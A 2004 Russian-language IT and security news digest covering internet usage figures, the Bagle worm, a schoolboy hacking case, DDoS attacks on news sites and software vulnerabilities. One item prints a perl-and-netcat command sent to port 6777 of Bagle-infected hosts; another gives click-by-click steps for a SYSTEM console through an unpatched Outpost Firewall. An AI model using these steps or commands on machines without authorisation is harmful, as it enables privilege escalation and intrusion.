Источник - http://www.crime-research.ru/

24/01/2004 15:50 Число пользователей Интернета в России выросло на четверть.
Согласно результатам исследования компании Ipsos-Reid, в 2003 году число пользователей Интернета в мире выросло на 7 процентов. Это самый значительный прирост за последние четыре года - в 2000-2002 годах число пользователей всемирной сети увеличивалось в среднем на 2 процента в год, пишет газета "Финансовые Известия". Наибольшее увеличение числа пользователей в прошлом году зарегистрировано в Китае (прирост составил 37 процентов), Германии (40 процентов), Южной Корее (32 процента) и Японии (38 процентов). Что же касается России, то, по данным исследования, здесь количество пользователей Интернета выросло на 25 процентов. При этом компания Ipsos-Reid учитывала только жителей городов. А в США число пользователей, наоборот, уменьшилось на 6 процентов. Наиболее активно пользуются Интернетом в Канаде: хотя бы раз в месяц в сеть выходит 71 процент взрослого населения страны. В пятерку мировых лидеров по этому показателю также вошли Южная Корея (70 процентов), США (68 процентов), Япония (65 процентов) и Германия (60 процентов). В России Интернетом пользуется 10 процентов городского населения.
Подробности - http://www.finiz.ru/cfin/tmpl-art_news/id_art-742689

23/01/2004 14:46 Два в одном: и PS2, и Xbox.
В США придумана машина, которая позволяет играть в компьютерные игры, созданные для разных платформ игровых приставок, в том числе PlayStation 2 и Xbox, не меняя операционной системы. В созданную калифорнийской компанией Digital Interactive Systems Corporation (Disc) консоль под названием Discover PC можно просто вставить диск с игрой, программное обеспечение его автоматически распознает вне зависимости от платформы и делает все необходимое для того, чтобы начать игру на экране телевизора. На основе технологий, придуманных компанией Disc, специализирующая на выпуске DVD-плееров фирма Apex Digital выпустила машину ApeXtreme. Этот компьютер, работающий на Window XP, распознает около 2 тысяч игр. Кроме того, ApeXtreme может также проигрывать DVD и MP3-диски. Новая консоль была представлена на выставке новинок потребительской электроники в Лас-Вегасе. ApeXtreme поступит в продажу в США в середине 2004 года. Стоить она будет около 400 долларов. Но поклонников новинки может ждать разочарование. Если у стареющего компьютера можно заменить компоненты, увеличив память и т.д., то у консоли ApeXtreme заменить "железо" невозможно. Поэтому "новинка" может очень быстро устареть.
Подробности - http://news.bbc.co.uk/hi/russian/sci...

23/01/2004 14:33 УФСБ по Новосибирской области расследует уголовное дело хакера-старшеклассника.
УФСБ по Новосибирской области расследует уголовное дело, возбужденное в отношении ученика 11 класса одной из местных школ по ч.1 ст.272 УК РФ (неправомерный доступ к компьютерной информации). По данным следствия, сообщили в группе общественных связей областного УФСБ, школьник взламывал компьютерные сети коммерческих фирм и за их счет пользовался Интернетом. Установлено, что от действий хакера пострадали, по крайней мере, две организации. Однако, подчеркнули в группе общественных связей, своевременное пресечение несанкционированного пользования сетью Интернет ограничило ущерб суммой чуть более 10 тыс. рублей. В группе общественных связей отметили, что в рамках данного дела, скорее всего, будут заявлены гражданские иски от пострадавших фирм.
Источник - http://fsb.ru/smi/ufsb/2004/040119-9.html

23/01/2004 14:08 PKWare и WinZip, кажется, договорились.
Молниеносная война форматов, едва не приведшая к коммерческой смерти обоих участников, вроде бы, завершилась к взаимному удовлетворению сторон. По информации агентства CNET, компании PKWare и WinZip смогли прийти к компромиссу в вопросе об унификации алгоритмов шифрования данных, применяемых в выпускаемых ими программах для сжатия файлов по zip-стандарту. Конфликт разгорелся полгода назад, когда PKWare, предложившая в свое время протокол Zip в качестве стандарта сжатия данных, встроила в свою версию программы-архиватора технологию шифрования сжимаемых данных SecureZip и не пожелала делиться этой технологией с конкурентами. В ответ, компания WinZip разработала свою собственную технологию криптозащиты, которая также была объявлена достоянием WinZip и никого больше. Пикантность момента состояла в том, что программы обеих компаний продолжали присваивать архивным файлам расширение «.zip», что в перспективе могло скомпрометировать популярный стандарт. После длительного противостояния компромисс был найден: PKWare согласилась передать WinZip права на использование SecureZip в ее продуктах и, в свою очередь, готова поддерживать формат шифрования, разработанный WinZip в собственной бесплатной программе PKZip Reader.
Источник - http://www.runet.ru

23/01/2004 13:24 X.org и Xfree86 объединяются.
Как сообщает linux.org.ru, на пресс-конференции, проведённой вчера на LinuxWorld 2004, члены старого концорциума X, некоторые самораспущенные члены группы основных разработчиков XFree86, а также Havoc Pennington из организации freedesktop.org объявили, что X.org и XFree86 в основном объедuнuлuсь и новая группа совместно работает над созданием не столько над более красивом в визуальном плане, а сколько более функциональном X сервере для Linux u Unix.
Подробности - http://www.newsforge.com/software/04/01/23/0020201.shtml?tid=130&tid=132&tid=82

23/01/2004 12:42 Неофициальный SuSE FAQ.
В рамках проекта sourceforge выложен неофициальный FAQ, автор которого Togan Muftuoglu, исследовав наиболее часто задаваемые вопросы в почтовом списке рассылки "SuSE Linux", решил собрать их вместе с ответами на подобные вопросы. Как обычно, представлены вопросы инсталляции, системного администрирования, обеспечения безопасности, взаимодействие с другими ОС и т.д.
Сайт - http://susefaq.sourceforge.net/

23/01/2004 12:05 "Яндекс" запускает "Спамооборону" в публичное пользование.
Компания "Яндекс" закончила тестирование своего сервиса "Спамооборона". 22 января на публичном почтовом сервере была установлена вторая версия этого фильтра. После долгих исследований, которые компания вела на протяжении всех месяцев тестирования, были созданы и реализованы алгоритмы, которые позволят сократить долю спама во входящей корреспонденции на 20-25%. Принцип работы "Спамообороны" заключается в следующем: 1. С роботами, которые рассылают спам, должны бороться "умные" алгоритмы; 2. Нужные письма не должны пропадать, поэтому о каждом письме, которое не было принято фильтром, сообщается отправителю; 3. Владелец почтового ящика сам решает, пользоваться ли ему фильтром, и какие письма он не хочет получать. По заверениям компании, пользователи "Яндекс.Почты" смогут вздохнуть свободнее. Конечно, никто не обещает полного избавления от спама, но его объемы должны резко упасть. Разработчики фильтра берут на заметку новейшие веяния в спамерских технологиях и создают защиту от уловок, к которым прибегают нарушители, чтобы обмануть фильтры.
Источник - http://www.compulenta.ru

23/01/2004 11:41 Уязвимость в mod_perl от Apache 2.
Как пишет dl на bugtraq.ru, передача файлового дескриптора в дочерние процессы делает возможным захват https-порта локальным пользователем. Об аналогичной утечке критичных дескрипторов уже сообщалось около года назад. Опасность моно оценить как вполне умеренную - если уж у взломщика дошло дело до правки cgi-скриптов, то это не самое страшное, что могло произойти.
Подробности - http://www.secunia.com/advisories/10697/

23/01/2004 10:33 Новый способ борьбы с вирусами и порнографией в Сети.
Израильский раввин Шломо Эльяху придумал молитву, призванную защитить пользователей интернета от пагубного влияния порнографии и компьютерных вирусов, сообщает "Компьюлента". Как сообщает агентство Reuters со ссылкой на крупную израильскую ежедневную газету Yedioth Ahronoth, молитва была написана раввином в ответ на настоятельные просьбы со стороны ортодоксальных иудеев. Они опасаются, что доступность контента для взрослых поставит под угрозу традиционные семейные ценности. В кратком переводе на русский молитва звучит следующим образом: "Господи, пожалуйста, помоги мне очистить компьютер от вирусов и нечестивых фотографий, которые отвлекают меня и мешают работать..., чтобы я смог очиститься". Эльяху, который является главным раввином города Сафед на севере Израиля, считает, что молитва является действенным способом борьбы с искушениями и опасностями интернета. Раввин рекомендует всем иудеям читать молитву, когда они заходят в интернет. Еще лучше, если они смогут настроить компьютер таким образом, чтобы молитва выводилась на экран при работе в Сети. Это позволит иудеям обрести духовную защиту на случай, если они попадут на сайт с непристойным содержанием случайно, или поддавшись искушению
Подробности - http://story.news.yahoo.com/news?tmpl=story&cid=582...

22/01/2004 19:59 Сегодня Mac отмечает свое 20-летие.
22 января 1984 года компания Apple представила революционный на тот момент продукт – персональный компьютер Macintosh. Два дня спустя новинка появилась на прилавках магазина, завоевав признание благодаря своей дружественности к пользователю и отсутствию необходимости учить премудрости компьютерных команд. «Мышка» и графический интерфейс типа «выбрал-и-нажал» позволяли даже несведущему в компьютерах человеку выполнять манипуляции с файлами простым нажатием кнопки и перетаскиванием иконок. Mac сразу же стал и остается сейчас чудом современного дизайна, когда техника не отпугивает пользователя, а приглашает его к сотрудничеству. А концепция Стива Джобса о том, что Mac - компьютер «для большинства из нас», быстро сделала его «рабочей лошадкой» графических дизайнеров и редакторов. Увы, Mac не смог победить в деловом мире, а отказ компании лицензировать свою ОС другим производителям стал серьезной ошибкой её руководства, благодаря которой мировую власть над пользователями ПК захватила MS-DOS, а затем её Mac-подобный наследник Windows. В итоге доля рынка, принадлежавшая детищу Apple, уменьшилась с двузначных чисел в середине 80-х до однозначных в 90-х. По словам чикагского аналитика Рода Бара (Rod Bare), хотя технология Apple и была самой лучшей, её упадок, в основном, произошел «только из-за недооценки Джобсом важности того, что для самой доступной или покупаемой платформы быть лучшей – необязательно».
Более подробно - http://www.cnews.ru/newsline/index.shtml?2004/01/22/154059

22/01/2004 18:04 Сайт сообщества ASP Linux.
15 января открылся сайт под названием "Ресурс сообщества АСПЛинукс". Представляет собой "хранилище пакетов и документации для ОС АСПЛинукс создан энтузиастами для простой установки в АСПЛинукс пользовательских программ, а также для получения пользователями свежей документации. В настоящее время мы работаем над АСПЛинукс версии 9.0" (взял в кавычки оригинал названия, выложенный на сайте - прим. ньюсмейкера).
Сайт - http://linux.alhimia.ru/

22/01/2004 17:49 В Нью-Йорке открылась выставка-конференция Linuxworld 2004.
20 января в Нью-Йорке открылась выставка-конференция Linuxworld 2004. Конференц-часть Linuxworld будет проходить с 20 по 23 января, а выставочная - с 21 по 23 января. Посвященная Linux выставка стала еще более ориентированной на корпоративный рынок.
Подробности - http://compulenta.ru/2004/1/21/44597/

22/01/2004 17:22 Хостинг вареза: этика и закон.
На сайте webinform.ru в рубрике "Провайдеры" опубликована статья с названием "Хостинг вареза: этика и закон". Варезные сайты – один из видов проявления пиратства в Сети. В роли жертвы - производители лицензионного софта. В роли злодея – авторы варезных сайтов. Но есть и третья сторона – хостеры, размещающие у себя проекты с варезным софтом. Администрация сайта обратилась к российским хостерам, производителям софта, авторам варезных сайтов и юристам, чтобы понять нынешнюю ситуацию на рынке. Их ответы опубликованы в статье. Причиной возникновения интереса к теме стало обращение в конце декабря прошлого года службы «саппорта» фирмы «Тамософт» в компанию Highway с просьбой удалить варезный сайт с продуктами первой, расположенный на хостинге данного провайдера.
Статья - http://www.webinform.ru/comments/541.html

22/01/2004 16:52 «Облтелеком» (Московская область): индивидуальные подключения по ADSL за $90.
Компания «Облтелеком» объявила об изменении стоимости подключения по ADSL для частных лиц. При условии наличия неспаренной телефонной линии услугой могут воспользоваться жители следующих подмосковных городов: Химки, Красногорск, Нахабино, Опалиха, Балашиха, Мытищи, Щелково, Фрязино, Ногинск, Электросталь, Долгопрудный, Пушкино, Ивантеевка, Лобня, Кашира, Коломна, Домодедово, Волоколамск, Лыткарино, Нарофоминск, Руза, Железнодорожный, Дубна, Истра, Луховицы, Озеры, Протвино, Пущино, Орехово-Зуево, Павлов-Посад, Талдом, Видное. Стоимость подключения составляет $90 с учетом НДС. Для работы можно использовать любой ADSL-модем (необходима поддержка g.Lite и g.DMT), который может быть приобретен самостоятельно, либо у компании за дополнительную плату в $100. Стоимость минимального ежемесячного платежа составляет $20 (без предоплаченного трафика), максимального — от $198 и выше, в зависимости от размера переработки по предусмотренному объему трафика.
Подробности - http://www.khimki.ru/

22/01/2004 16:39 Хакеры осадили сайт izvestia.ru.
Во вторник, 20 января в 9.00 по минскому времени, неизвестные хакеры начали распределенную DoS-атаку (DDoS-атака) на информационный сайт www.charter97.org. За сутки до этого на нем была опубликована статья "Белорусские корни торговцев Child Porn", которая, видимо, и послужила причиной атаки. Вплоть до настоящего времени сайт выведен из строя и доступна одна страница, на которой читателей держат в курсе происходящего, а также приведена та самая статья. Но такая ситуация не была единичной. На информационном портале izvestia.ru чуть раньше был опубликован материал на эту же тему. И 19 января на него началась атака. Принцип ее состоит в том, что злоумышленник ищет некоторое количество компьютеров, у которых в операционных системах присутствуют незакрытые уязвимости, и использует их в дальнейшем для организации нападения. Машины могут быть расположенны в разных точках мира. Именно с них производится "бомбардировка" конкретного сервера тысячами запросов. Администраторы портала установили, что общим для всех компьютеров, которые участвовали в атаке, является открытый 1900-й порт, на который посылается UDP-пакет с подменой IP-адреса отправителя внутри и URL атакуемого сервера. Таким образом, пользователи компьютеров даже не подозревали, что их машины участвуют в атаке. Игорь Ворошилов, интернет-аналитик онлайновой редакции "Известий", так отзывается о прошедшей атаке: "Она продолжалась почти двое суток. Остановить такого типа DoS-атаку практически невозможно, поскольку автора UDP-запросов на компьютеры-посредники отследить очень сложно, да и вероятность того, что злодей именно со своей личной машины организует атаку, почти нулевая. Можно только защититься от нее каким-либо из способов, которые, в общем, тоже давно известны. Мы сумели прикрыть "тропу войны" через час с небольшим после начала налета. Наши программисты написали скрипт, который позволяет отследить те IP-адреса, количество запросов с которых было велико, и блокировать доступ к сайту именно для них. При этом остальные пользователи видят izvestia.ru как и прежде."
Источник - http://www.compulenta.ru

22/01/2004 16:21 IBM предлагает спецификацию веб-сервисов.
IBM и несколько других компаний предложили две спецификации для отслеживания событий в приложениях веб-сервисов в обход аналогичного проекта, представленного две недели назад корпорацией Microsoft. Задачей новых спецификаций, называемых WS-Notifications и WS-Resource Framework, является обеспечение стандартизованного способа программирования бизнес-приложений, автоматически реагирующих на такие события, как понижение уровня материальных запасов или отказ аппаратуры сервера. В число авторов WS-Notification входят Akamai Technologies, организация по стандартизации grid-систем Globus Alliance, Hewlett-Packard, IBM, SAP, Sonic Software и Tibco Software. IBM, HP и Globus Alliance совместно трудились и над спецификацией WS-Resource Framework, в которой описывается, как вводить в приложения веб-сервисов данные о состоянии вычислительных ресурсов. Веб-сервисы — это попытка соединить проприетарное ПО от разных производителей посредством стандартного способа связи между распределенными системами. IBM и Microsoft три года назад опубликовали общий план разработок и совместно разработали ряд стандартов веб-сервисов.
Более подробно - http://www.zdnet.ru/?ID=312618

22/01/2004 15:34 Уменьшается количество инцидентов, вызванных червем Bagle.A.
На пике активности были заблокированы сотни тысяч писем с этим вредоносным кодом. Согласно данным, поступающим в международную Службу технической поддержки компании Panda Software, количество инцидентов, вызванных червем Bagle.A, идет на убыль. Bagle.A мощно стартовал, распространившись по миру за считанные часы. Были заблокированы сотни тысяч писем с этим червем. Например, зафиксирован случай, когда в сеть одной из западных компаний менее чем за 24 часа пытались попасть почти 100 000 электронных писем с Bagle.A. Тем не менее, поскольку пользователи были своевременно информированы о характеристиках Bagle.A и оперативно обновили свои антивирусные программы, количество циркулирующих зараженных посланий существенно уменьшилось. Как следствие, активность вируса вернулась к нормальному уровню.
Источник - http://www.viruslab.ru

22/01/2004 15:13 Американская интернет-система для голосования оказалась не защищена от хакеров
Интернет-система для голосования на президентских выборах, разработанная по заказу Пентагона, оказалась недостаточно защищена от постороннего вмешательства, сообщает сайт газеты NY Times. К такому выводу пришла группа экспертов по компьютерной безопасности, проверявших по заказу американского правительства работу экспериментальной системы для голосования через интернет (Secure Electronic Registration and Voting Experiment, SERVE). На разработку этой системы Пентагон выделил более 22 миллионов долларов. Планируется, что она будет введена в эксплуатацию в течение ближайших двух недель, и с ее помощью американские военнослужащие и гражданский персонал смогут голосовать на праймериз и президентских выборах в 2004 году. "Мы настоятельно рекомендуем отказаться от использования этой системы для голосования и не заниматься разработками ее аналогов до тех пор, пока интернет не претерпит фундаментальных изменений или не будет создана принципиально новая система защиты передаваемых данных", - говорится в отчете, подготовленном по итогам работы группы экспертов по компьютерной безопасности.
Подробности - http://www.nytimes.com/2004/01/21/technology/23CND-INTE.html?...

22/01/2004 10:19 Возможность идентификации Honeyd.
Niels Provos от имени команды разработчиков проекта Honeyd (программа, имитирующая уязвимую систему на виртуальных серверах для исследования методов работы хакеров) сообщает о существовании возможности удалённой идентификации существования на сервере Honeyd. Эта возможность связана с некорректной реализацией модуля идентификации работы сканера NMAP. Из-за этой некорректности на определённого рода TCP-пакеты Honeyd отвечает пакетами с установленными флагами SYN и RST. Исследуя ответы удалённого сервера, злоумышленник имееет возможность определить на сервере наличие ловушки, коей, собственно, и является Honeyd. Для устранения уязвимости была выпущена версия Honeyd 0.8, в которой также была уусовершенствована работа в среде chroot, а также более корректная работа с системными привилегиями. Производители дистрибутива Gentoo также объявили об обновлении пакета Honeyd в их версии ОС Linux.
Подробности - http://www.citi.umich.edu/u/provos/honeyd/

22/01/2004 09:40 Способ дистанционного удаления трояна Bagle.
В списке рассылки TH-Research (The Trojan Horses Research Mailing List - список рассылки, посвящённый исследованию троянов) Joe Stewart предложил простой и эффективный способ удаления трояна Bagle, об эпидемии которого мы сообщали ранее. Как известно, троян вешается на порт 6777 и ожидает команд на этом порту.Чтобы не ожидать 28 января (когда троян сам деактивируется), Джо предложил администраторам метод удалённого уничтожения трояна. Заключается он в выдаче на заражённую машину определённой последовательности команд, которая автором представлена в 16-ричном виде. Используется Перл и NetCat (nc). Команда для удаления выглядит следующим образом:
perl -e 'print "x43xffxffxffx00x00x00x00x0412x00"' | nc infected_host_IP 6777.
Как видно, формируемая на Перле строка передаётся на порт 6777 инфицированного хоста. При этом троян деактивируется и удаляет собственный исполнимый файл в системе. Однако, как замечает автор, ключ реестра при этом не удаляется.
Источник - http://ecompute.org/th-list

21/01/2004 18:31 Microsoft вводит новые условия лицензионных соглашений.
Корпорация Microsoft планирует объявить о новых условиях лицензионных соглашений для Microsoft Communications Protocol Program (MCPP) с целью привлечь к его использованию большее число компаний. Обновленное лицензионное соглашение предусматривает бесплатное использование 24 протоколов, а также облегченный доступ к техническим данным будущих программных продуктов компании. Microsoft пошел на этот шаг в связи с обеспокоенностью относительно того, что MCPP, который был выпущен в связи с требованиями антимонопольного законодательства, не пользовался ожидаемым успехом. Истцы по антимонопольному делу против Microsoft выразили озабоченность излишней сложностью программы. Они также уверены, что Microsoft не обеспечил равную, по сравнению с MCPP, совместимость OC Windows с программными продуктами других компаний. По состоянию на октябрь 2003 г. общее число лицензионных соглашений на использование MCPP достигло 11. Microsoft утверждает, что переговоры ведутся еще с 20 компаниями. Однако, представители истцов обеспокоены тем, что некоторые компании, заключившие лицензионные соглашения, уже являлись близкими партнерами корпорации.
Источник - http://www.cnews.ru

21/01/2004 18:14 Новое сетевое оборудование Cisco.
Компания Cisco Systems обновила ассортимент своего сетевого оборудования коммутаторами Catalyst 3750 Metro и гигабитными модулями для коммутаторов Catalyst 6500 и маршрутизаторов Cisco 7600. Коммутаторы серии Metro предназначены для провайдеров сетей Metro Ethernet, которые получили распространение в небольших, но густонаселённых городах Европы и Азии. Там с их помощью обеспечивается широкополосный доступ пользователей в интернет и организуются VPN-сети, причём стоимость этих решений оказывается ниже традиционных. С помощью коммутаторов Cisco Catalyst 3750 Metro Series провайдеры смогут предоставлять пользователям такие сервисы, как VPN-сети класса Layer 2 и Layer 3, обеспечивая должный уровень сервиса посредством служб SLA (Service Level Agreement). В линейке Catalyst 3750 присутствуют модели с количеством портов от 24 до 48, обеспечивающие скорость соединения 10/100/1000 Мбит/с. Количество uplink-портов варьируется от 2 до 4 штук. С применением технологии Cisco StackWise общая пропускная способность стойки из девяти коммутаторов может достигать 32 Гбит/с. 48-портовый гигабитный модуль для Catalyst 6500 и Cisco 7600 позволяет гибко наращивать пропускную способность сетевой инфраструктуры и использовать для этого разные среды передачи сигнала.
Источник - http://www.compulenta.ru

21/01/2004 18:00 В поисках исходного кода игры Half-Life 2.
На минувшей неделе ФБР и Секретная служба США провели несколько рейдов в домах подозреваемых к делу о краже исходного кода игры Half-Life 2, которая разрабатывается компанией Valve. Напомним, что осенью прошлого года Valve рассказала о похищении неизвестными хакерами кода одной из самых ожидаемых игр. Вскоре компания объявила, что из-за утечки кода вынуждена отложить выход игры до весны 2004 года. Весть о краже кода вызвала неоднозначную реакцию. Некоторые комментаторы даже предположили, что утечка кода была сфабрикована Valve с целью получить формальный повод для задержки выпуска игры. Тем не менее, американские спецслужбы ведут активный поиск похитителей кода. И, похоже, следствие напало на какой-то след. На прошедшей неделе агенты ФБР и Секретной службы США провели серию обысков в домах участников группы Hungry Programmers. Один из них, Крис Тошок, рассказал о происшедшем в своем блоге. По словам Тошока, 14 января в полседьмого утра к нему домой нанесли визит агенты ФБР и Секретной службы, предъявившие ордер на обыск и изъятие компьютерного оборудования. Самому Тошоку и его соседу никаких обвинений предъявлено не было. Федеральные агенты лишь конфисковали девять компьютеров и массу другого цифрового оборудования. Судя по предъявленным документам, конфискация техники была проведена в рамках расследования дела о похищении кода Half-Life 2.
Источник - http://www.cyberinfo.ru/

21/01/2004 17:13 Детектор червей от Check Point ведет учет уязвимостям.
Устройство InterSpect компании Check Point знает обо всех известных уязвимостях и выявляет подозрительную деятельность в сети, которая может указывать на попытки воспользоваться ими. Производитель брандмауэров Check Point выпустил устройство для защиты корпоративных сетей от кибератак, использующих известные уязвимости в LAN-протоколах и приложениях. Устройство InterSpect сообщается с регулярно обновляемой базой данных известных уязвимостей, и когда пакеты, связанные с определенным приложением, начинают вести себя подозрительно, перехватывает управление, ставит соответствующий ПК на карантин и предупреждает пользователя о том, что доступ к общей сети временно прекращается — до тех пор, пока компьютер не будет очищен. Компании, как правило, защищают свои сети по периметру, и если злоумышленный код занесен вовнутрь (например, через зараженный ноутбук), то возникают проблемы. InterSpect позволяет сегментировать сеть, так что в случае тревоги зоны риска — такие как «зона соприкосновения», где работает много пользователей с ноутбуками, — могут быть быстро изолированы от остальной сети.
Подробнее - http://news.zdnet.co.uk/internet/security/0,39020375,39119177,00.htm

21/01/2004 16:49 Хакеры взломали 150 общественных веб-сайтов за 3 дня.
В Малайзии за три дня было взломано более ста пятидесяти веб-ресурсов, 120 из которых принадлежали государственному сектору. Национальная группа оперативного реагирования на чрезвычайные ситуации в области компьютеров (MyCERT) получила информацию, что хакеры «порезвились» подобным образом в Китае, Гонконге и Тайване. Пострадали ресурсы таких доменных зон, как .gov, .net, .com, .edu и .org. Большинство из них работали на серверах под управлением операционной системы Linux, которая считается более безопасной, нежели Windows. В основном взломщики использовали существующие уязвимости данных ОС. Менеджер MyCERT Солахуддин Шамсуддин считает, что инцидента можно было избежать, если бы системные администраторы внимательно следили за информацией о появляющихся проблемах в известных операционных системах. Кроме того, г-н Шамсуддин сказал, что массовый дефейс – это дело рук двух бразильских хакерских группировок ( ^XRed Eye^Y и ^XIr4dex^Y), которые, видимо, устроили соревнование.
Источник - http://www.runet.ru

21/01/2004 16:31 Ещё одна статья по переходу с ядра 2.4 на 2.6.1.
На сайте opennet.ru опубликована очередная статья, посвящённая процессу перехода с ядра 2.4 на новую версию 2.6.1. Автор - Галина Николаевна Анигина. Процесс сборки ориентирован на дистрибутив Slackware 9.1.
Статья - http://www.opennet.ru/base/sys/26_kernel_install.txt.html

21/01/2004 15:28 Выход Sendmail 8.12.11.
18 января был выпущен новый релиз sendmail 8.12.11, сообщает linux.org.ru. В этой версии разработчики исправили несколько ошибок, улучшили совместимость с некоторыми операционными системами и вернули старый алгоритм кодирования MIME 7-bit base64 для 8-и битного текста. Чтобы использовать новый алгоритм (от которого пока отказались) нужно компилировать sendmail с параметром -DMIME7TO8_OLD=0. Если при этом у вас будут наблюдаться случаи неправильного кодирования, разработчики просят сообщить им подробности.
Подробности - http://www.sendmail.org/8.12.11.html

21/01/2004 15:11 Для защиты от вирусов и хакеров кубинцам запретят выходить в интернет.
Запрет на использование обычных телефонных линий для выхода в интернет, введенный властями Кубы, обусловлен лишь стремлением защитить пользователей и сети от хакерских атак и компьютерных вирусов. Об этом заявил министр связи и информации Кубы Игнасио Гонсалес Планас, сообщает сайт 24 Horas libre. Согласно решению кубинских властей, пользователи телефонных номеров, оплачиваемых в песо, с 24 января лишатся возможности выходить в интернет через модем. При этом на номера, оплата которых производится в долларах, новое ограничение распространяться не будет. С учетом, того, что в валюте телефонные номера на Кубе оплачивают лишь предприятия и иностранные граждане, подавляющее большинство кубинцев лишилось возможности выходить в интернет по низким ценам. Новый закон предусматривает ряд исключений и для пользователей номеров, оплачиваемых в песо. Возможность выходить в интернет по-прежнему останется у государственных чиновников, ученых и врачей. По данным Гонсалеса Планаса, в стране с 11-миллионным населением в настоящее время зарегистрировано около 480 тысяч электронных почтовых адресов. Число компьютеров на Кубе составляет 270 тысяч, из них соединение с интернетом имеют почти 65%. От себя хотелось бы добавить, что в одной из воинских частей ВС РФ "защищаются" от хакеров ещё более огригинальным (и, надо признать, на 100% надёжным) способом, но это уже другая история... ;)
Источник - http://www.viruslist.com

21/01/2004 14:17 Датскую компанию оштрафовали на 68 тысяч долларов за рассылку спама.
Датский суд оштрафовал телекоммуникационную компанию Aircom на 68 тысяч долларов за рассылку полутора тысяч писем со спамом, передает агентство Reuters. Иск против Aircom подало датское агентство по защите прав потребителей. Его юристы заявили, что компания нарушила законы, регулирующие политику в области маркетинга. Разбирательство по делу Aircom стало вторым таким случаем в Дании. В мае 2003 года другая датская компания была оштрафована на 2,5 тысячи долларов за рассылку 153 несанкционированных сообщений. В датском законодательстве за рассылку спама предусмотрен минимальный штраф в размере более полутора тысяч долларов. Дополнительный штраф начисляется в случае, если спамер разослал более 100 несанкционированных сообщений. Вот бы у нас оштрафовали подобным образом пару-тройку фирм...
Подробности - http://www.reuters.com/newsArticle.jhtml?type=internetNews&storyID=4175186

20/01/2004 16:47 Эксплоит уязвимости в OpenSSL.
Bram Matthys выпустил эксплоит уязвимости в OpenSSL, которая возникает в подпрограмме разбора протокола ASN.1. Уязвимостиь была обнаружена ещё в октябре прошлого года. Необходимо отметить, что большинство производителей дистрибутивов давно обновили свои пакеты (как и OpenSSL). Напомним, что уязвимости были подвержены версии до 0.9.6j (включительно) и 0.9.7b.
Эксплоит - http://www.securityfocus.com/archive/1/349837/2004-01-10/2004-01-16/0

20/01/2004 15:29 Уязвимость в Outpost Firewall.
Secure Network Operations,Inc. cообщает о нахождении уязвимости в популярном персональном файрволле Agnitum Outpost Firewall версий 1.х и 2.х. Уязвимость является локальной и позволяет обычному пользователю получить привилегии SYSTEM. Связано это с тем, что персональный файрволл запускается с привилегиями SYSTEM. Для выполнения подобной атаки необходимо выполнить следующие действия. Нажать правой кнопкой мышки на иконке Outpost в трэе, выбрать пункт меню "Options...", выбрать "приложение" или "плагин" (дополнение), выбрать "Add.." и выбрать c:winntsystem32cmd.exe. Консоль запустится с привилегиями SYSTEM. Просто и со вкусом. ;) Второй спооб заключается в запуске блокнота (notepad.exe) в меню "Help". Хотелось бы заметить, что Agnitum было выпущено обновление.
Подробности - http://www.securityfocus.com/archive/1/350221/2004-01-17/2004-01-23/0

20/01/2004 14:52 Сайт, посвящённый восстановлению информации.
В рунете обнаружен довольно интересный и нужный многим пользователям и администраторам ОС семейства Windows, посвящённый восстановлению информации. Как пишет сам автор (Андрей Кармаданов), "Этот сайт создан с целью помочь всем тем, у кого внезапно (а это всегда бывает внезапно) пропали данные. Не загружается компьютер, удален нужный файл, выключили электричество - и теперь можно видеть лишь жалкие развалины вместо столь привычных "Мои документы" и "program Files"... Если Вы хоть немного разбираетесь в том, как хранится информация на жестком диске, то приведенная здесь информация может Вам помочь. Если же нет, почитайте странички из "Справочной", узнаете много полезного".
Сайт - http://members.fortunecity.com/carnie/

20/01/2004 13:01 Утилита для удаления червя Bagle.A.
Вчера мы сообщали о появлении нового опасного червя, которому присвоено названием Bagle.A. Помимо описанного механизма заражения и распространения, было выяснено, что червь ожидает соединения на порту 6777 и пытается соединиться с предварительной хакнутой машиной с адресом 151.201.0.39 (об этом, в частности, пишет Gadi Evron в Bugtraq). Также некоторые антивирусные компании отмечают, что червь имеет ограничение по времени ( что может указывать на возможность скорого появления его более совершенных версий) - срок действия Bagle-A истекает 28 января. Ввиду исключительной опасности червя (помноженной на степень человеческой глупости (только она может заставить запустить исполняемый файл во вложении) - прим. ньюсмейкера) компания Panda Software предлагает всем пользователям бесплатную утилиту PQREMOVE, предназначенную для эффективного лечения любого компьютера, пораженного червем Bagle.A (для загрузки утилиты необходимо зарегистрироваться на сайте).
Утилита - http://www.pandasoftware.com/download/utilities/

20/01/2004 12:40 Nokia выпустит Perl для Series 60.
Компания Nokia в ближайшем будущем откроет доступ для разработчиков к интерпретатору языка Perl для платформы Nokia Series 60 (на данной платформе разработаны такие модели телефонов как Nokia 3650/6600/7650). Как сообщили представители компании, выпуск подобного продукта для разработчиков преследует собой несколько целей: применение Perl значительно упрощает разработку простых бизнес-приложений, взаимодействие пользователя с которыми основано на формах. Применение Java для таких приложений подчас несет избыточную сложность, ко всему прочему, из Java программ в телефонах Nokia нет прямого доступа к таким функциям, как отправка SMS или получение записи из записной книжки телефона.
Источник - http://www.mobile-review.com

20/01/2004 11:53 Недельный отчет о вирусах от Panda Software.
Опубликован первый в этом году еженедельный отчёт о вирусной активности прошедшей недели от Panda Software. В отчёте рассмотрены: Exploit/URLSpoof и три троянца - Downloader.AC, Bookmark.C, Agent.A. Exploit/URLSpoof не классифицируется как вирус, троянец или червь, поскольку это HTML код, включемый в сообщения или веб страницы и позволяющий использовать брешь в Internet Explorer. Эта ошибка может позволить создать гиперссылку, при нажатии на которую откроется иной адрес, нежели в адресной строке браузера. В течение нескольких последних дней было зарегестрировано большое количество электронных сообщений, использующих брешь URLSpoof с целью обмана пользователей и получения от них конфиденциальной информации - номера счетов, имена пользователей, пароли и прочие секретные коды. Появляющиеся поддельные сообщения отправляются от имени банков, например, Citibank или Barclays, и сообщают пользователям, что из-за имеющей место ошибки им следует зайти на веб сайт и проверить личные данные. Однако, веб страница, на которую они переходят по ссылке, передаст всю введенную ими информацию злоумышленнику, который впоследствии сможет использовать ее в своих личных целях.
Более подробно - http://www.viruslab.ru/press/index.php?go=show&num=227

20/01/2004 11:30 О дистрибутивах Linux.
